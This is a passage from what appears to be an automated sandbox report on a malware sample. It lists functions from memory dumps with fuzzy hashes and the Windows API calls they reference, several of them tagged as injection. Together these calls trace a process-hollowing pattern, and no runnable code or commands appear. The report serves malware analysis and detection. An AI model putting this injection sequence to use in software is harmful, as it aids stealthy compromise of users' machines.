                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48290fcaed78bb86154aac4da40d6af964e81defd26ddf0f96519fa56504f818
                                                                  • Instruction ID: 0c4259424380dd7c5fe5c23b54cf88805001c6d4205770faae9e1c2e648bde47
                                                                  • Opcode Fuzzy Hash: 48290fcaed78bb86154aac4da40d6af964e81defd26ddf0f96519fa56504f818
                                                                  • Instruction Fuzzy Hash: 3E514675E4062ADFDB24CF65C840BD9B7B2BF89300F109AEAD509B7240EBB05A85CF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025865C8, Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b151be42e160fa25c1c4b40180419c165d766c5e1099bf1578ed968251cfa4
                                                                  • Instruction ID: 15a8a359382ca6f03ce68af6087700ff920c50fcb24947dab7a69aa30349a847
                                                                  • Opcode Fuzzy Hash: 01b151be42e160fa25c1c4b40180419c165d766c5e1099bf1578ed968251cfa4
                                                                  • Instruction Fuzzy Hash: 80312670D06268CFDB10EFA6D958BEDBBF9BB0A305F148429D005B3290C7B48945CB68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025865B7, Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c048c6294af6cecb73afa8091ad45d515eab99df9c57d7e2502f9783cb4ca5c
                                                                  • Instruction ID: b796cff331dbe69dc8f37867a72ba149a11d61ee3ad826fd6d9ca9fa3c2c73dd
                                                                  • Opcode Fuzzy Hash: 0c048c6294af6cecb73afa8091ad45d515eab99df9c57d7e2502f9783cb4ca5c
                                                                  • Instruction Fuzzy Hash: 57318B70D06258CFDB00EFA6E458BEDBFF9BB0A311F149429D005B7291C7B88985CB18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D25B80, Relevance: .1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49f0340c9c71a88acc0b2f17e0b9fa3837d84367609433ba200865d8929e3e05
                                                                  • Instruction ID: bd13c8fd90721a94cc5a86ff2d68b16e795ae9ae4f348aaa620aada5f1083718
                                                                  • Opcode Fuzzy Hash: 49f0340c9c71a88acc0b2f17e0b9fa3837d84367609433ba200865d8929e3e05
                                                                  • Instruction Fuzzy Hash: D821E671E006188BEB18CF9BD9446DEFBF3AFC8310F14C16AD508A6358DB355955CA50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02582587, Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 025827BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: e20634269f1b522b5128e97ee575783f790fecb2d6a5d8895636bf467b5a9044
                                                                  • Instruction ID: 4854bfa49e4ed5d25b612a13cd02e1f0f62acdc94c5a38c30f9fa202486c5672
                                                                  • Opcode Fuzzy Hash: e20634269f1b522b5128e97ee575783f790fecb2d6a5d8895636bf467b5a9044
                                                                  • Instruction Fuzzy Hash: A7914971D002598FDF14EF69C8417DDBBB2BB48318F148569D809F7280DBB49985CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02582588, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 025827BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 0b66e14594adc93b37f032c87f6166bbf95b2e6b02d96bf4301adf93e48dbf1c
                                                                  • Instruction ID: d721f0f4043b37b379dd8acf9abc281f098b3e6f1e0b1ca51a102b55da88466a
                                                                  • Opcode Fuzzy Hash: 0b66e14594adc93b37f032c87f6166bbf95b2e6b02d96bf4301adf93e48dbf1c
                                                                  • Instruction Fuzzy Hash: BB914971D002598FDF14EF69C8817DEBBB2BB48318F148569D809F7280DBB49985CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0BBB8, Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3664d40a696ad08d3636e663ab63a4ae3d72d6bf919b4f0caa74f3dd3299de43
                                                                  • Instruction ID: 2374ed3fda2fd1c4de59abf72964d03eb9153fb55917a037f91607040acd7948
                                                                  • Opcode Fuzzy Hash: 3664d40a696ad08d3636e663ab63a4ae3d72d6bf919b4f0caa74f3dd3299de43
                                                                  • Instruction Fuzzy Hash: F6714670A04B058FD724DF2AD05175ABBF1FF88314F04892EE58AD7B90DB35E8068BA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0B1EC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00D0DD8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 0d52e67408e1c59d0b76e6af158c88d9cab8674aeda481b675048d1737bbead0
                                                                  • Instruction ID: fd402006699f0e97b538c29b146d1f53cdb58181160381a74aec8e860759d9ba
                                                                  • Opcode Fuzzy Hash: 0d52e67408e1c59d0b76e6af158c88d9cab8674aeda481b675048d1737bbead0
                                                                  • Instruction Fuzzy Hash: D651B1B1D00309DFDB14CF99C884ADEBBB6FF48314F24812AE819AB250D7749945CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0DC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00D0DD8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 3a9e6f4cf538d67eb471e07682256a14dba6f9a4977130eb1592331228bae232
                                                                  • Instruction ID: a112bdb9155279759c63402d160dbec67409018c3195a2540aba64e700d43d62
                                                                  • Opcode Fuzzy Hash: 3a9e6f4cf538d67eb471e07682256a14dba6f9a4977130eb1592331228bae232
                                                                  • Instruction Fuzzy Hash: EF51B3B1D00309DFDB14CF99D884ADEBBB6FF48314F24812AE819AB250D7749945CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D06D51, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D06E4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: e55a6253051bb0c4709f2d5c63e19d94f6e7ad0be58ef60bf7db519d8f9bbab8
                                                                  • Instruction ID: bec73b184ed6b99cb27a47396d7cb84db1ad4bb98b83f451d7bcdd27e0c3508e
                                                                  • Opcode Fuzzy Hash: e55a6253051bb0c4709f2d5c63e19d94f6e7ad0be58ef60bf7db519d8f9bbab8
                                                                  • Instruction Fuzzy Hash: 7F416A76900248AFCB01CF99D844AEEBFF5FB48320F15805AF958A7351D7359915CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025821DF, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 025822AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: f320edb61a4b4d82d1ca5d8a76ca3a4e34e326f41f3b6df89b4b7675e6098243
                                                                  • Instruction ID: fa5d6d09c191e7012527b0987342e92f200d9258694710f0d91802637341accb
                                                                  • Opcode Fuzzy Hash: f320edb61a4b4d82d1ca5d8a76ca3a4e34e326f41f3b6df89b4b7675e6098243
                                                                  • Instruction Fuzzy Hash: 7231D2329443C98FCB01CFA59455ADEBFF1AF45320F28885ED495EB212C7B9858ACB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025821BC, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 025822AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 38f328234f1b0c03bacc7cc1a7822b3ee25159509efdb96d30665a6d8fd2e392
                                                                  • Instruction ID: 2c82dbb2499b9065ab867a781bb16df566dfa8ad72ca3c9770f9bfafae0fc222
                                                                  • Opcode Fuzzy Hash: 38f328234f1b0c03bacc7cc1a7822b3ee25159509efdb96d30665a6d8fd2e392
                                                                  • Instruction Fuzzy Hash: CF21BA729003498FCB10DFA9C8406DFBFF1EF88324F14841AE559AB241CB759905CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025822F8, Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02582390
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 7e70bd20eb7e5db2c3f54f8cee8a49657f78ae06aa52574df7ca068afea234b4
                                                                  • Instruction ID: 32e8dc6d845d51a4c62754c29335cad2198d8c49669a5a64153e0ee129a0cc32
                                                                  • Opcode Fuzzy Hash: 7e70bd20eb7e5db2c3f54f8cee8a49657f78ae06aa52574df7ca068afea234b4
                                                                  • Instruction Fuzzy Hash: F72148719003498FCF10DFA9C884BDEBBF1BF48314F14852AE969A7241CB789945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02582300, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02582390
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: ac42fd5c1e3addf45e504413e0b6e3595f5b32d94234adc92c56815acc005070
                                                                  • Instruction ID: a9303a4a597814466ec28bab881ccbdcbfc645dffd1a692f8aa7075719778b03
                                                                  • Opcode Fuzzy Hash: ac42fd5c1e3addf45e504413e0b6e3595f5b32d94234adc92c56815acc005070
                                                                  • Instruction Fuzzy Hash: 842127719003499FCF10DFAAC885BDEBBF5FF48314F54842AE919A7241DB789945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025823EF, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02582470
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 90e6814ad628cc5f47112fed8502c1ca81c107cd6dcc57cbb744a8fa88bb0a9b
                                                                  • Instruction ID: 9e8f561f34bb93c4072d175892c6b56981d139b170f281482d618b1ec6906e1a
                                                                  • Opcode Fuzzy Hash: 90e6814ad628cc5f47112fed8502c1ca81c107cd6dcc57cbb744a8fa88bb0a9b
                                                                  • Instruction Fuzzy Hash: 3C2159B1C003499FCF10DFAAC8806EEBBF5FF48314F50842AE918A7650CB789945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D06DC0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D06E4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 7dca590164fbde4924206eecdfa683342f55a3056b3776051321597a9f591c0a
                                                                  • Instruction ID: b0c7b9200a31763aa774e15a3e51c00a1940cb5c62747e209b6de05db7e5b46d
                                                                  • Opcode Fuzzy Hash: 7dca590164fbde4924206eecdfa683342f55a3056b3776051321597a9f591c0a
                                                                  • Instruction Fuzzy Hash: 3E21E0B59012489FDB10CFA9D984ADEBBF5EF48324F24801AE918A7350D778A955CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02581AD8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 02581B5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: 5aee8d6863233b98b013b8ff7fed334bed9361f6fb963882278fe236ff55e44e
                                                                  • Instruction ID: 6064acc8d5e224a10e0dae0b5337e1e1aa22c1ff7b37e58221f1cb9d498f321b
                                                                  • Opcode Fuzzy Hash: 5aee8d6863233b98b013b8ff7fed334bed9361f6fb963882278fe236ff55e44e
                                                                  • Instruction Fuzzy Hash: 0F2137719007088FCB10DFAAC5847EEBBF5EF48228F14842AD559B7641DB789946CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02581AE0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 02581B5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: cdc911dc8a782748e396f010b784aca583cf8d99f0e6690083e96f0ad37df805
                                                                  • Instruction ID: 44c9ffaf9c1d3a4fc09fb06c68df2e8a1d78775a8e1867695da3d8460ddee17b
                                                                  • Opcode Fuzzy Hash: cdc911dc8a782748e396f010b784aca583cf8d99f0e6690083e96f0ad37df805
                                                                  • Instruction Fuzzy Hash: 392149719007088FCB10DFAAC4847EEBBF4EF48368F54842AD559B7241DB789945CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 025823F0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02582470
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 80873d7cd56b61c1b33f1bc9994c466b587ec27b0952de80f27c166204adc118
                                                                  • Instruction ID: 4f483fc9f5c24b452d47dc631e0d8df68d83ef78eac8547866dfc257573b4d6e
                                                                  • Opcode Fuzzy Hash: 80873d7cd56b61c1b33f1bc9994c466b587ec27b0952de80f27c166204adc118
                                                                  • Instruction Fuzzy Hash: 742139B1D003499FCF10DFAAC8846EEBBF5FF48314F54842AE958A7650CB789945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D06DC8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D06E4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: b42ad941e5d3a5580c1012e289d4b0704a260c59bed0e3e67c53ade16d076254
                                                                  • Instruction ID: da349cdd806aeb02510b6eed8afec527e171e3abfd6d22ab8b1a49afb53a0739
                                                                  • Opcode Fuzzy Hash: b42ad941e5d3a5580c1012e289d4b0704a260c59bed0e3e67c53ade16d076254
                                                                  • Instruction Fuzzy Hash: 2F21D5B59013489FDB10CFA9D884ADEBBF8FB48324F14841AE918A7350D774A955CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D2C3C8, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D2C43B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 8c24bcadda33c757571927493419b969b92f910e30cd870723268443bd7c0bf3
                                                                  • Instruction ID: f5536c8828c1549ed823ac415b6a7fe18d5bbae829cfb3ff5a7a18de4943320d
                                                                  • Opcode Fuzzy Hash: 8c24bcadda33c757571927493419b969b92f910e30cd870723268443bd7c0bf3
                                                                  • Instruction Fuzzy Hash: 602117B19006099FCB10CF9AC884BDEFBF4FB48324F548029E558A7240D778A945CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0B0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D0BE89,00000800,00000000,00000000), ref: 00D0C09A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 436ebc603481da4083af1c5602fe00f35910a06fe5cc00dc0d6ba89821fdfbbc
                                                                  • Instruction ID: bde5d2060589adc94ae46acc5f90ec3186991973c1d8131297c009191caabb87
                                                                  • Opcode Fuzzy Hash: 436ebc603481da4083af1c5602fe00f35910a06fe5cc00dc0d6ba89821fdfbbc
                                                                  • Instruction Fuzzy Hash: DD1136B2900208CFCB20CF9AD444B9EBBF4EB48314F14852EE919A7240C774A945CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D2E248, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OutputDebugStringW.KERNELBASE(00000000), ref: 06D2F950
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID: DebugOutputString
                                                                  • String ID:
                                                                  • API String ID: 1166629820-0
                                                                  • Opcode ID: cc72839063e42d549f551c2b39bddfe1c2ed58acc1bb385e89f0b7e0edbc0d0e
                                                                  • Instruction ID: de3677da2949e478adc44324c75eed7f3825cdca3f00df7a135068690552b0f7
                                                                  • Opcode Fuzzy Hash: cc72839063e42d549f551c2b39bddfe1c2ed58acc1bb385e89f0b7e0edbc0d0e
                                                                  • Instruction Fuzzy Hash: 771123B1C0065A9BCB10CF9AD444B9EFBB4FB48328F14852AE818B7700C774AA55CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02582240, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 025822AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: bce2be2f90e523ab98e36e0b0f3711ef706b46a36cb1acbb61bbf57026207e92
                                                                  • Instruction ID: 1f505c4b73c39ff91531f664fecd2d7ef951eb725116b52bd4322182ba9c5c3e
                                                                  • Opcode Fuzzy Hash: bce2be2f90e523ab98e36e0b0f3711ef706b46a36cb1acbb61bbf57026207e92
                                                                  • Instruction Fuzzy Hash: 2E1137719003489FCF10DFAAC8447DFBBF5AF88324F148419E919A7250CB759945CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0C028, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D0BE89,00000800,00000000,00000000), ref: 00D0C09A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: adcbd816da9cb44d53d68d516b5e3c49ceee85b4fdceccb103dea0b049b0bd92
                                                                  • Instruction ID: 9a7daacf3857af6136268a52c9bbd07918334981acf43334ba94948d13127cd1
                                                                  • Opcode Fuzzy Hash: adcbd816da9cb44d53d68d516b5e3c49ceee85b4fdceccb103dea0b049b0bd92
                                                                  • Instruction Fuzzy Hash: C911F2B6900209CBCB10DF9AD544B9EFBB4AB88314F14851ED919A7640C775A949CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02581A29, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 20d9db139697ecb08b3cc56f0cb912c2431021c2516609826821c221067d3511
                                                                  • Instruction ID: 93a24b479346e19ca6ad2e6aaea428cfbf7c621358986a95f0ec424ab8fb7396
                                                                  • Opcode Fuzzy Hash: 20d9db139697ecb08b3cc56f0cb912c2431021c2516609826821c221067d3511
                                                                  • Instruction Fuzzy Hash: 561146B1E007498FDB10DFAAD4447EEBBF4AF88324F24842AD529A7640CB749945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02581A30, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 1ec8be3912f9d5d84f290805d0cc8c60ce6f39338d7a739421a15fde3e7f5c10
                                                                  • Instruction ID: aaa155506c3a904f6ab9a9123f6319e830997807dae87913824c40ecd9c1f272
                                                                  • Opcode Fuzzy Hash: 1ec8be3912f9d5d84f290805d0cc8c60ce6f39338d7a739421a15fde3e7f5c10
                                                                  • Instruction Fuzzy Hash: 82113AB1D007488FCB10DFAAD4447EFFBF5AF88224F148419D519B7640CB74A945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02585633, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02585695
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: fdc310ab1793767917a8929611fe6b64c5a9f86ed4701a045280a241536a786d
                                                                  • Instruction ID: 3965261f9849aca79ce08317781a300bee8f2a1c281f464637831b30a00006bf
                                                                  • Opcode Fuzzy Hash: fdc310ab1793767917a8929611fe6b64c5a9f86ed4701a045280a241536a786d
                                                                  • Instruction Fuzzy Hash: 7911F2B58003489FCB10DF9AD485BDEBFF8EB48324F24845AE855A7600C375A985CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0BE0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: da594d8edfc92d232f288ec2595fb2e9ee34b9a1f2cd67006be4043ed36426ae
                                                                  • Instruction ID: e222cd02e0e7c702822d79d764373e8492acf3f57998c6dd3474cd6cb9e2e471
                                                                  • Opcode Fuzzy Hash: da594d8edfc92d232f288ec2595fb2e9ee34b9a1f2cd67006be4043ed36426ae
                                                                  • Instruction Fuzzy Hash: BB110FB6C006498FCB10CF9AC444BDEFBF4EB88324F14841AD829A7640C378A946CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02585638, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02585695
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: e2b7076583a3a7779e08ab42c789b7f9a90760442319eadffbcaa503626a5577
                                                                  • Instruction ID: 86a3630c85ff26256e595b1806f39da340acb9726e07e8924ddc2fd8153791a6
                                                                  • Opcode Fuzzy Hash: e2b7076583a3a7779e08ab42c789b7f9a90760442319eadffbcaa503626a5577
